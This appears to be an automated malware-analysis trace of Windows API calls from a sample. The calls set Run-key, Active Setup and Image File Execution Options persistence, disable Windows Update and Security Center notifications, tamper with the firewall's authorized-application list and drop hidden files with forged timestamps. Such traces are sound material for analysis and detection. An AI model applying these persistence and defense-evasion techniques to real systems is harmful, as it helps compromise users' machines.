                                                                                                                                                                      • WSAStartup.WS2_32(00000002,?), ref: 00403E97
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00403E9F
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00000104), ref: 00403EA6
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00403EAD
                                                                                                                                                                      • LoadLibraryA.KERNEL32(rasapi32.dll,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00403EDA
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,004070E4), ref: 00403F01
                                                                                                                                                                      • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 00403F34
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00407105), ref: 00403F5B
                                                                                                                                                                      • LoadLibraryA.KERNEL32(wininet.dll), ref: 00403FD9
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,004071CC), ref: 00404042
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,004071DA), ref: 00404052
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,004071EB), ref: 00404062
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,004071FC), ref: 00404072
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,0040720F), ref: 00404082
                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00404347
                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,000000F0,00000000,00000002,00000000), ref: 00404366
                                                                                                                                                                      • ReadFile.KERNEL32(?,004120C0,00000010,?,00000000,?,?,00000002,00000000), ref: 00404386
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,004120C0,00000010,?,00000000,?,?,00000002,00000000), ref: 00404392
                                                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,00678128), ref: 0040445F
                                                                                                                                                                      • wsprintfA.USER32 ref: 004044BC
                                                                                                                                                                      • CreateMutexA.KERNEL32(0040F4FC,00000001,qnd_b__-13,?,?,?,?,?,?,?,?,00000000), ref: 004044D0
                                                                                                                                                                      • GetLastError.KERNEL32(qnd_b__-13,?,?,?,?,qnd_b__-13,?,?,?,?,?,?,?,?,00000000), ref: 004044E4
                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00404506
                                                                                                                                                                      • RegDeleteValueA.ADVAPI32(00000000,ShellRegEx,?,?,?,?,?,?,qnd_b__-13,?,?,?,?,qnd_b__-13), ref: 00404532
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,ShellRegEx,?,?,?,?,?,?,qnd_b__-13,?,?,?,?,qnd_b__-13), ref: 0040453E
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,qnd_b__-13,?,?,?,?,qnd_b__-13), ref: 0040456E
                                                                                                                                                                      • Process32First.KERNEL32(00000000,?), ref: 0040458C
                                                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,00678128), ref: 004045C1
                                                                                                                                                                      • OpenProcess.KERNEL32(00100201,00000000,?), ref: 004045DE
                                                                                                                                                                      • Process32Next.KERNEL32(00000000,?), ref: 00404603
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00404613
                                                                                                                                                                      • SetPriorityClass.KERNEL32(?,00000040), ref: 00404633
                                                                                                                                                                      • TerminateProcess.KERNEL32(?,00000000), ref: 00404658
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00678129,00001388), ref: 0040468F
                                                                                                                                                                      • CloseHandle.KERNEL32(00678129,00001388), ref: 00404698
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080), ref: 004046BC
                                                                                                                                                                      • DeleteFileA.KERNEL32(?,00000080), ref: 004046C5
                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00020019,?,?,?,?,?,?,?,?,qnd_b__-13), ref: 004046F4
                                                                                                                                                                      • RegCreateKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00000000,00000000,000F003F,0040F4FC,?,00000000), ref: 0040472B
                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,Default Flags,00000000,00000000,00412170,?,?,?,0040F4FC,?,00000000), ref: 00404766
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412170,00000012,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 00404790
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,00000012,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 004047A1
                                                                                                                                                                      • RegDeleteKeyA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy), ref: 004047BA
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,0040F4FC,?,00000000), ref: 004047CC
                                                                                                                                                                      • ExitProcess.KERNEL32(00000000,?,?,?,qnd_b__-13,?,?,?,?,qnd_b__-13), ref: 004047E2
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,qnd_b__-13,?,?,?,?,qnd_b__-13), ref: 00404804
                                                                                                                                                                      • RegCreateKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00000000,00000000,000F003F,0040F4FC,?,00000000,?,?,?,qnd_b__-13), ref: 0040484E
                                                                                                                                                                      • RegCreateKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00000000,00000000,000F003F,0040F4FC,?,00000000), ref: 0040487A
                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,Extended Flags,00000000,00000000,004120C4,?,?,?,0040F4FC,?,00000000,?,?,?,qnd_b__-13), ref: 004048B1
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,Extended Flags,00000000,00000003,004120C4,0000000C,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 004048D7
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,004120C4,?,?,?,0040F4FC,?,00000000,?,?,?,qnd_b__-13), ref: 004048E9
                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(%ComSpec%,?,00000104,?,?,?,?,?,?,?,004120C4,?,?,?,0040F4FC,?), ref: 00404906
                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00404925
                                                                                                                                                                      • GetFileTime.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,?,004120C4,?), ref: 00404954
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,004120C4,?), ref: 00404963
                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32(?,00000100), ref: 00404998
                                                                                                                                                                      • lstrcatA.KERNEL32(?,00411030,?,00000100,?,?,00000104,?,?,?,?,?,?,?,004120C4,?), ref: 004049A9
                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00678128,?,00411030,?,00000100,?,?,00000104), ref: 004049B0
                                                                                                                                                                      • lstrcpyA.KERNEL32(?,%CommonProgramFiles%\System\,?,?,?,?,?,?,00000104), ref: 004049E6
                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00678128,?,%CommonProgramFiles%\System\,?,?,?,?,?,?,00000104), ref: 004049ED
                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,?,?,%CommonProgramFiles%\System\,?,?,?,?,?,?,00000104), ref: 004049FC
                                                                                                                                                                      • lstrcpyA.KERNEL32(?,%AppData%\,?,?,?,?,?,?,?,?,?,%CommonProgramFiles%\System\), ref: 00404A2B
                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00678128,?,%AppData%\,?,?,?,?,?,?,?,?,?,%CommonProgramFiles%\System\), ref: 00404A32
                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,?,?,%AppData%\,?,?,?,?,?,?,?,?,?,%CommonProgramFiles%\System\), ref: 00404A48
                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000,?,?,00000100,?,?,00000104), ref: 00404A8F
                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,000000F0,00000000,00000002,00000000,?,?,00000100,?,?,00000104), ref: 00404AA9
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,004120C0,00000004,?,00000000,?,?,00000002,00000000,?,?,00000100,?,?,00000104), ref: 00404AC3
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,004120C0,00000004,?,00000000,?,?,00000002,00000000,?,?,00000100,?,?,00000104), ref: 00404AC9
                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000100,00000001,00000000,00000003,00000000,00000000,?,?,00000100,?,?,00000104), ref: 00404AF2
                                                                                                                                                                      • SetFileTime.KERNEL32(00000000,?,?,?,00000000,?,?,00000100,?,?,00000104), ref: 00404B1E
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,?,00000100,?,?,00000104), ref: 00404B27
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000021,?,?,?,00000100,?,?,00000104), ref: 00404B3C
                                                                                                                                                                      • CloseHandle.KERNEL32(?,00000021,?,?,?,00000100,?,?,00000104), ref: 00404B48
                                                                                                                                                                      • GetStartupInfoA.KERNEL32(?), ref: 00404B55
                                                                                                                                                                      • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00404B75
                                                                                                                                                                      • ExitProcess.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00000100,?,?,00000104), ref: 00404B7F
                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00000104), ref: 00404BA5
                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000104,?,?,?,?,?,?,?,004120C4,?), ref: 00404BC3
                                                                                                                                                                      • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00000104), ref: 00404BF8
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00000104), ref: 00404C04
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00001000,00401379,?,00000000,?), ref: 00404C3F
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,00000104,?,?,?,?,?,?,?,004120C4,?), ref: 00404C48
                                                                                                                                                                      • RegCreateKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe,?), ref: 00404C95
                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00404CB5
                                                                                                                                                                      • lstrcatA.KERNEL32(?,00411030,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404CC6
                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,006781A0,?,00411030,?,00000104), ref: 00404CCD
                                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,{9703941E-446E-952F-954A-3DA8A91ED84F},?,?,00000104), ref: 00404CF3
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,00002710,?,?,?,?,?,00000104), ref: 00404D0F
                                                                                                                                                                      • CloseHandle.KERNEL32(?,00002710,?,?,?,?,?,00000104), ref: 00404D1E
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,?,{9703941E-446E-952F-954A-3DA8A91ED84F},?,?,00000104), ref: 00404D48
                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404D63
                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 00404E01
                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E3B
                                                                                                                                                                      • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00404E74
                                                                                                                                                                      • SetFileTime.KERNEL32(?,?,?,?), ref: 00404EA9
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00404EB8
                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00404ED7
                                                                                                                                                                      • RegDeleteValueA.ADVAPI32(?,Debugger,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00404EEB
                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?,?), ref: 00404F03
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,Debugger,00000000,00000001,?,00000001,?,?,?,?,?,?,?,?,?,00000000), ref: 00404F1E
                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00404FD2
                                                                                                                                                                      • Sleep.KERNEL32(000007D0,?,?,?,{10F5781A-0D97-0F99-EF77-BA382916E579},?,?,00411030), ref: 00405188
                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 0040525A
                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405291
                                                                                                                                                                      • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 004052CB
                                                                                                                                                                      • SetFileTime.KERNEL32(?,?,?,?), ref: 00405300
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040530F
                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0040532E
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,IsInstalled,00000000,00000004,00000001,00000004,?,?,?,?,?,00000000,00000000), ref: 0040536A
                                                                                                                                                                      • lstrlenA.KERNEL32(?,00000004,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?,?), ref: 00405373
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,StubPath,00000000,00000001,?,00000001,?,?,?,?,?,?,?,?,?,00000000), ref: 0040538E
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00000080,00000000), ref: 004053B2
                                                                                                                                                                      • RegDeleteKeyA.ADVAPI32(80000001,?), ref: 004053C7
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,ShellRegEx), ref: 00405402
                                                                                                                                                                      • lstrcmpiA.KERNEL32(?), ref: 00405445
                                                                                                                                                                      • lstrcmpiA.KERNEL32(?,?), ref: 00405464
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080), ref: 00405480
                                                                                                                                                                      • DeleteFileA.KERNEL32(?,00000080), ref: 00405489
                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004054B0
                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 004054CE
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004054ED
                                                                                                                                                                      • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040551E
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,0040F580,00000C00,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 00404D9D
                                                                                                                                                                        • Part of subcall function 0040140F: wsprintfA.USER32 ref: 00401422
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00000080,00000000), ref: 00404F42
                                                                                                                                                                      • GetComputerNameA.KERNEL32(?,?), ref: 00404F72
                                                                                                                                                                      • lstrcpyA.KERNEL32(?,QlC5hT0yHn63XEm5LqJ2OxSkGj2v,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404F98
                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404FB5
                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00404FDE
                                                                                                                                                                      • wsprintfA.USER32 ref: 00405088
                                                                                                                                                                      • lstrcpyA.KERNEL32(?,SOFTWARE\Microsoft\Active Setup\Installed Components\), ref: 004050C3
                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,{4D415259-4a4f-4e45-5334-4D4152594a4f},?,SOFTWARE\Microsoft\Active Setup\Installed Components\), ref: 004050CE
                                                                                                                                                                      • RegCreateKeyA.ADVAPI32(80000002,?,?), ref: 004050E4
                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040510D
                                                                                                                                                                      • lstrcatA.KERNEL32(?,00411030), ref: 0040511E
                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00678178,?,00411030), ref: 00405125
                                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,{10F5781A-0D97-0F99-EF77-BA382916E579},?,?,00411030), ref: 0040514B
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,00002710,?,?,?,?,?,00411030), ref: 00405167
                                                                                                                                                                      • CloseHandle.KERNEL32(?,00002710,?,?,?,?,?,00411030), ref: 00405176
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,?,{10F5781A-0D97-0F99-EF77-BA382916E579},?,?,00411030), ref: 004051A0
                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 004051BB
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00410200,00000800,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 004051F5
                                                                                                                                                                      • RegDeleteValueA.ADVAPI32(00000000,ShellRegEx), ref: 004053F3
                                                                                                                                                                      • lstrcpyA.KERNEL32(?), ref: 004055C0
                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?,?), ref: 004055D5
                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(%AppData%\,?,00000104,?,?,?), ref: 00405610
                                                                                                                                                                      • GetTempFileNameA.KERNEL32(?,tmp,00000000,?,00000104,?,?,?), ref: 0040562C
                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000104,?,?,?), ref: 0040564B
                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,?,?,?,00000104,?,?,?), ref: 00405673
                                                                                                                                                                      • GetTempFileNameA.KERNEL32(?,tmp,00000000,?,?,?,?,?,00000104,?,?,?), ref: 00405693
                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,00000104,?,?,?), ref: 004056B6
                                                                                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00000104), ref: 004056EA
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00000104), ref: 004056F6
                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000), ref: 00405715
                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405760
                                                                                                                                                                      • lstrcatA.KERNEL32(?,00411030,?,00000104,?,?,?,?,?,?,00000104,?,?,?), ref: 00405771
                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00678290,?,00411030,?,00000104,?,?,?,?,?,?,00000104,?,?,?), ref: 00405778
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00678290,?,00411030,?,00000104,?,?,?,?,?,?,00000104), ref: 00405783
                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00411030,?,00000104), ref: 0040579E
                                                                                                                                                                      • WriteFile.KERNEL32(?,00407C80,00001400,?,00000000,?,?,?,?,?,?,00000080,00000000,?,00000104,?), ref: 004057DC
                                                                                                                                                                      • SetFileTime.KERNEL32(?,?,?,?), ref: 0040580A
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 00405819
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00000080,00000000,00411030,?,00000104,?,?,?,?,?,?,00000104), ref: 0040586E
                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(%AppData%\,?,00000104,?,?,?,?,00000080,00000000,00411030,?,00000104), ref: 004058AC
                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000104,?,?,?,?,00000080,00000000,00411030,?,00000104), ref: 004058BB
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000080,?,00000104,?,?,?,?,00000080,00000000,00411030,?,00000104), ref: 004058C6
                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,00000104,?,?,?,?,00000080), ref: 004058E1
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00000080,00000000,?,?,?,00000104,?,?,?,?,00000080,00000000,00411030), ref: 004058FD
                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,?,00000080,00000000,?,?,?,00000104), ref: 0040591B
                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000104,?,?,?,?,?,?,00000080,00000000,?,?,?,00000104), ref: 00405927
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000080,?,00000104,?,?,?,?,?,?,00000080,00000000,?,?,?,00000104), ref: 00405932
                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000104,?,?,?,?,?,?,00000080), ref: 0040594D
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00000080,00000000,?,00000104,?,?,?,?,?,?,00000080,00000000), ref: 00405969
                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040599B
                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(%AppData%\,?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000080,00000000), ref: 004059C0
                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000080,00000000), ref: 004059CF
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000080,?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000080), ref: 004059DA
                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,00000104), ref: 004059F5
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00409080,00006400,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 00405A27
                                                                                                                                                                      • CloseHandle.KERNEL32(?,00000000,00409080,00006400,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 00405A33
                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,?,00000080,00000000,?,?,?,00000104), ref: 00405A50
                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000104,?,?,?,?,?,?,00000080,00000000,?,?,?,00000104), ref: 00405A5C
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000080,?,00000104,?,?,?,?,?,?,00000080,00000000,?,?,?,00000104), ref: 00405A67
                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000104,?,?,?,?,?,?,00000080), ref: 00405A82
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00409080,00006400,?,00000000,?,?,?,?,?,?,00000080,00000000,?,00000104,?), ref: 00405AB4
                                                                                                                                                                      • CloseHandle.KERNEL32(?,00000000,00409080,00006400,?,00000000,?,?,?,?,?,?,00000080,00000000,?,00000104), ref: 00405AC0
                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00006400,?,00000000), ref: 00405AF8
                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00020006,?,?,?,?,?,?,?,00000080,00000000,?,00000104,?), ref: 00405B2E
                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00020006,?), ref: 00405B4F
                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,00020006,?,?,?,?,?,?,?,00000080,00000000), ref: 00405B79
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,00000000,00000001,?,00000001,?,?,?,?,?,?,?,00020006,?), ref: 00405B95
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00020006,?,?,?,?,?,?,?,00000080,00000000), ref: 00405BA7
                                                                                                                                                                      • RegCreateKeyA.ADVAPI32(80000002,SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU,?), ref: 00405BF2
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,NoAutoUpdate,00000000,00000004,?,00000004), ref: 00405C1B
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,00000004,?,?,?,?,?,?,?,?,?,?,?,00020006,?), ref: 00405C2A
                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Security Center,00000000,00020006,?,?,?,?,?), ref: 00405C9C
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,AntiVirusOverride,00000000,00000004,?,00000004,?,?,?,?,?,?,?,?,?), ref: 00405CC5
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,AntiVirusDisableNotify,00000000,00000004,?,00000004,?,AntiVirusOverride,00000000,00000004,?,00000004), ref: 00405CDD
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,FirewallDisableNotify,00000000,00000004,?,00000004,?,AntiVirusDisableNotify,00000000,00000004,?,00000004,?,AntiVirusOverride,00000000,00000004), ref: 00405CF5
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,UpdatesDisableNotify,00000000,00000004,?,00000004,?,FirewallDisableNotify,00000000,00000004,?,00000004,?,AntiVirusDisableNotify,00000000,00000004), ref: 00405D0D
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,00000004,?,?,?,?,?,?,?,?,?), ref: 00405D1C
                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List,00000000,0002001F,?,?,?,?,?,00020006,?,?,?,?,?), ref: 00405D52
                                                                                                                                                                      • RegDeleteValueA.ADVAPI32(?,00000000,?,?,?,0002001F,?,?,?,?,?,00020006,?), ref: 00405DCE
                                                                                                                                                                      • RegEnumValueA.ADVAPI32(?,?,00000000,?,00000000,?,00004000,00004000), ref: 00405E0A
                                                                                                                                                                      • wsprintfA.USER32 ref: 00405E24
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000000,00000001,?,?,?,?,0002001F,?), ref: 00405E3B
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,0002001F,?), ref: 00405E54
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00010000,00402818,00000002,00000000,?), ref: 00405E77
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00020006,?), ref: 00405E80
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000021), ref: 00405F00
                                                                                                                                                                      • RegCreateKeyA.ADVAPI32(80000002,?,?), ref: 00405F1D
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,IsInstalled,00000000,00000004,00000001,00000004), ref: 00405F5D
                                                                                                                                                                      • lstrlenA.KERNEL32(?,00000004), ref: 00405F66
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,StubPath,00000000,00000001,?,00000001), ref: 00405F81
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,00000001,?,00000001), ref: 00405F90
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000021,?,?,?,?,?,?,?,00000001), ref: 00405FAC
                                                                                                                                                                      • RegCreateKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe,?), ref: 00405FC6
                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00405FE6
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,Debugger,00000000,00000001,?,00000001), ref: 00406001
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,00000001,?,00000001), ref: 00406010
                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00020006,?), ref: 00406039
                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00020006,?), ref: 0040605A
                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,00020006,?), ref: 00406071
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,00000000,00000001,?,00000001,?,?,?,?,?,?,?,00020006,?), ref: 0040608D
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,?,?,?,?,00020006,?), ref: 0040609C
                                                                                                                                                                      • RegCreateKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,00000000,00000000,000F003F,0040F4FC,?,00000000), ref: 004060D6
